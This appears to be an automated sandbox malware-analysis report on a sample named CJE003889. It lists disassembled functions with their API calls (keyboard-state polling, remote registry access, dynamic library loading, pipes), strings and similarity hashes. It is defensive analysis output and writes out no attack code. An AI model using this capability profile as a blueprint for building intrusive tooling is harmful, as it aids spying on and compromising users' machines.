Instruction ID: 49a1e27b2e669ba500638be3e587f0a2ca48c5609e47edb79e0812b8976caa35
Opcode Fuzzy Hash: 7f38eb8afe15e5eb736b120d798dbf3d303a5f24a04700bbb718d395bc16c29b
Instruction Fuzzy Hash: BE21CF71220285BFEF108F66DC80EBB37ACEB683A4F104629FA20971E0D735DC41A720

Function 00CC6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00CC6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CC6DEF
GetStdHandle.KERNEL32(0000000C), ref: 00CC6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00CC6E3B

Strings

nul, xrefs: 00CC6E36

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 2188722ce2b671584ee2784b7b27473e667745eeeb73d7cc5e0280f61a22d85f
Instruction ID: 2a84191d62f9761b283fae5a95f6c64c720730d5939d6db53fb1f62b6cc07a13
Opcode Fuzzy Hash: 2188722ce2b671584ee2784b7b27473e667745eeeb73d7cc5e0280f61a22d85f
Instruction Fuzzy Hash: 8421817560020AABDB209F29DD44F9E77A4EF44720F20462DFDB1D72D0DB709951DB60

Function 00CC6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00CC6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CC6EBB
GetStdHandle.KERNEL32(000000F6), ref: 00CC6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00CC6F06

Strings

nul, xrefs: 00CC6F01

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 086d7d36e9c8ff8be6e4e7ae8d73ebdd16a4b7a3844c2dfffc1f948c5496145b
Instruction ID: 9fd0975f25ea4b8f6dbd0526bb73d48e33a7b1c91ac976d5349baadf09daddd9
Opcode Fuzzy Hash: 086d7d36e9c8ff8be6e4e7ae8d73ebdd16a4b7a3844c2dfffc1f948c5496145b
Instruction Fuzzy Hash: 72219D79600305ABDB209F69DE44FAA77E8AF45720F200A1EF9B1D72D0DB70A951CB60

Function 00CCAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00CCAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CCACA8
__swprintf.LIBCMT ref: 00CCACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00CEF910), ref: 00CCACFF

Strings

%lu, xrefs: 00CCACBB

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 634928ea453c31f0e6627fc631ef102a351bed4cb3d5c5f0f63c574ee83294b4
Instruction ID: 9cb5680ebb650de91c6285806b6e9931a703b4eb07e775da71dadd8cb27879c8
Opcode Fuzzy Hash: 634928ea453c31f0e6627fc631ef102a351bed4cb3d5c5f0f63c574ee83294b4
Instruction Fuzzy Hash: 56217131A0014DAFCB10DFA5C985EEE7BB8EF49714B0040A9F909DB252DB31EA45DB21

Function 00CC1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00CC1B19

Strings

KEYS, xrefs: 00CC1B30
REMOVE, xrefs: 00CC1B1F
EXISTS, xrefs: 00CC1B41
APPEND, xrefs: 00CC1B52

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 790ace82a10c23a05c1c3034be7f436920b6e139422fa424d3dda63f90ff657f
Instruction ID: 2001db0e1975c9e6eff3fd28795ecd5ff47203237bc5e9e9cbaed06e6bd421cd
Opcode Fuzzy Hash: 790ace82a10c23a05c1c3034be7f436920b6e139422fa424d3dda63f90ff657f
Instruction Fuzzy Hash: 1B115E749002089FCF44EF55D8629EEB7B5FF26308F244469D82467292EB329D0AEF54

Function 00CDEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CDEC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CDEC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CDED6A
CloseHandle.KERNEL32(?), ref: 00CDEDEB

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 558696c16712da4350f2db2124f92a3721228bba2c25e06be2b2da7849c43228
Instruction ID: 48e2d26b29b707e6df6a1fad066419fd96cc9e776fdd834e3d4c5bf2c189d55c
Opcode Fuzzy Hash: 558696c16712da4350f2db2124f92a3721228bba2c25e06be2b2da7849c43228
Instruction Fuzzy Hash: 988160B1600301AFD720EF28C886F2AB7E5EF58710F04891DFA999B3D2DA70AD45CB51

Function 00C8541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C8547B
_memcpy_s.LIBCMT ref: 00C854ED
__read_nolock.LIBCMT ref: 00C8554B
__filbuf.LIBCMT ref: 00C8556E
_memset.LIBCMT ref: 00C855B2

Part of subcall function 00C88B28: __getptd_noexit.LIBCMT ref: 00C88B28

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: 45b9dc25b0b3f71891dfccb25994aa59bd4b0f02e602b3a7771e152f3f7d8ff1
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: BC51C870A00B05DFDF24AF69D84466E77B6AF80329F248729F835962D0D7B0DE909B49

Function 00CE0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

Part of subcall function 00CE0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDFDAD,?,?), ref: 00CE0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CE00FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CE013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CE0183
RegCloseKey.ADVAPI32(?,?), ref: 00CE01AF
RegCloseKey.ADVAPI32(00000000), ref: 00CE01BC

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 4c6a70020c5de9d0e853b33d845811cb1ac547b03f2bdaa48ae4688496764b6c
Instruction ID: 0f09994c31ed3df6bfc0482fb2b7a558a5cbcab4e9d2c56e87efe7a7c05e1c8d
Opcode Fuzzy Hash: 4c6a70020c5de9d0e853b33d845811cb1ac547b03f2bdaa48ae4688496764b6c
Instruction Fuzzy Hash: FD519C71208244AFC714EF58C881F6EB7E8FF84304F10492DF5958B2A2DB71E945DB92

Function 00CDD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CDD927
GetProcAddress.KERNEL32(00000000,?), ref: 00CDD9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00CDD9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00CDDA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CDDA21

Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CC7896,?,?,00000000), ref: 00C65A2C
Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CC7896,?,?,00000000,?,?), ref: 00C65A50

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 7dda724804ac5c45c53a7e6ce4a5afb479749a794a7af5b486e3d085358f6118
Instruction ID: b60f6c10ed84cf52e002a5cb313ca2f74866fe532876b0d53af894881c9283b6
Opcode Fuzzy Hash: 7dda724804ac5c45c53a7e6ce4a5afb479749a794a7af5b486e3d085358f6118
Instruction Fuzzy Hash: BE512A35A00209DFCB10EFA8C4949ADB7F4FF59310B14C06AE95AAB312DB31AE45DF50

Function 00CCE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CCE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CCE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CCE687

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CCE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CCE6B4

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 079056fa8efc82eb523a3564edd202f30ad54f3d46e03fbf40a8e10230cea8dc
Instruction ID: bb7d06a529177bd0ec257c75af9eb8be0ea691b0e621eb7e2e04ffb30548ce42
Opcode Fuzzy Hash: 079056fa8efc82eb523a3564edd202f30ad54f3d46e03fbf40a8e10230cea8dc
Instruction Fuzzy Hash: B251FA35A00109DFCB11EF64C981AAEBBF9EF09314F1480A9E959AB361CB31ED15DB50

Function 00CEA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d48b2e3dd5d00e83af7788bd4775d4d29f28581aa17001e65fe04d5a1f5583c
Instruction ID: 5edf643a0d006879e1137dd1bd4a8bba4756f1900b7d799babd6599c8c3f33c6
Opcode Fuzzy Hash: 5d48b2e3dd5d00e83af7788bd4775d4d29f28581aa17001e65fe04d5a1f5583c
Instruction Fuzzy Hash: 3D41E635904284EFD720DF2ADC88FADBBA8EB09310F154165F826E72E0C770BE41DA61

Function 00C62344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C62357
ScreenToClient.USER32(00D257B0,?), ref: 00C62374
GetAsyncKeyState.USER32(00000001), ref: 00C62399
GetAsyncKeyState.USER32(00000002), ref: 00C623A7

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: d2a3b8fd80a51f2f0093af1f4fc3bb0e93f2b896fd1bb3454b050f2ec2823c6d
Instruction ID: b19084c1404a34425962354787c4a6b5d4594a347574a6e11bfcb7dbb4cae4ec
Opcode Fuzzy Hash: d2a3b8fd80a51f2f0093af1f4fc3bb0e93f2b896fd1bb3454b050f2ec2823c6d
Instruction Fuzzy Hash: FD418435604605FBDF259F69C888AEDBB78FB05360F20436AF835962A0C7349E50EF91

Function 00CB63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CB63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00CB6433
TranslateMessage.USER32(?), ref: 00CB645C
DispatchMessageW.USER32(?), ref: 00CB6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CB6475

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 9e1f433487ce32c595cdf4b2ec4325cde6b0dc8358e708307e3613092aa891c4
Instruction ID: 95205790176fee218ffdd545b0318e2585f2d7924827d8b5bc8f5edb9334e094
Opcode Fuzzy Hash: 9e1f433487ce32c595cdf4b2ec4325cde6b0dc8358e708307e3613092aa891c4
Instruction Fuzzy Hash: A7319231540B569FDB24CFB0D844FEA7BA8AB11314F140179E425C71A0E7799946DB60

Function 00CB8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00CB8A30
PostMessageW.USER32(?,00000201,00000001), ref: 00CB8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00CB8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00CB8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00CB8AF8

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 1936dee6b2df4b9574fe5dd0441233903f779139b7cfd62bd82ed6e47de645dc
Instruction ID: 59653d21fa068d3d6666dbe3e86df95a777e8af92949c459bb8e59f35a86ce06
Opcode Fuzzy Hash: 1936dee6b2df4b9574fe5dd0441233903f779139b7cfd62bd82ed6e47de645dc
Instruction Fuzzy Hash: 0F31B171500259EBDF14CFA8DD8CBDE7BB9EB05315F108229F925EA1D0C7B09A14DB90

Function 00CBB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00CBB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CBB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CBB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CBB27F
_wcsstr.LIBCMT ref: 00CBB289

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: ecd7caf565ebe08ee51bb4a9cbca2e7f5b60d8aadecc5bc1eb0983d24aa8663a
Instruction ID: 699c389cdf91d722f5b042d85c94a52d066e6baadb5ff0ce88e4e24e4f69bf95
Opcode Fuzzy Hash: ecd7caf565ebe08ee51bb4a9cbca2e7f5b60d8aadecc5bc1eb0983d24aa8663a
Instruction Fuzzy Hash: 7621D0322042447BEB25AB79DC49ABF7BACDF49720F10413DF805DA1A1EBA19D41A3A1

Function 00CEB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623

GetWindowLongW.USER32(?,000000F0), ref: 00CEB192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00CEB1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CEB1CF
GetSystemMetrics.USER32(00000004), ref: 00CEB1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CD0E90,00000000), ref: 00CEB216

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: b5d2bbf768315dac71e7e730822d3c787ad5c444d1fa3d097c13eabf0db5fe88
Instruction ID: 427d3e36c610d94fb0f112ddfe176f4c961d49927c2cc2e32e8a7b72a576d578
Opcode Fuzzy Hash: b5d2bbf768315dac71e7e730822d3c787ad5c444d1fa3d097c13eabf0db5fe88
Instruction Fuzzy Hash: 9C217C71A106A1AFCB209F3A9C44B7F7BA4EB15331F104628BA32D72E0E7309D119B90

Function 00CB9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CB9320

Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CB9352
__itow.LIBCMT ref: 00CB936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CB9392
__itow.LIBCMT ref: 00CB93A3

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 22a9bbfb1739616b4a4f4d8d41af34f8e97ac9754ca8c3c096394c532b9e59a8
Instruction ID: ae841ec43dc41cb2f913cf93c1bf76958e6e9f384486d7bf42079bb153382b9a
Opcode Fuzzy Hash: 22a9bbfb1739616b4a4f4d8d41af34f8e97ac9754ca8c3c096394c532b9e59a8
Instruction Fuzzy Hash: FD21D735700248BBDB20AA658CC5EEE7BFDEF88714F044029FA45DB1E1D6B0CE459791

Function 00CD5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00CD5A6E
GetForegroundWindow.USER32 ref: 00CD5A85
GetDC.USER32(00000000), ref: 00CD5AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00CD5ACD
ReleaseDC.USER32(00000000,00000003), ref: 00CD5B08

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
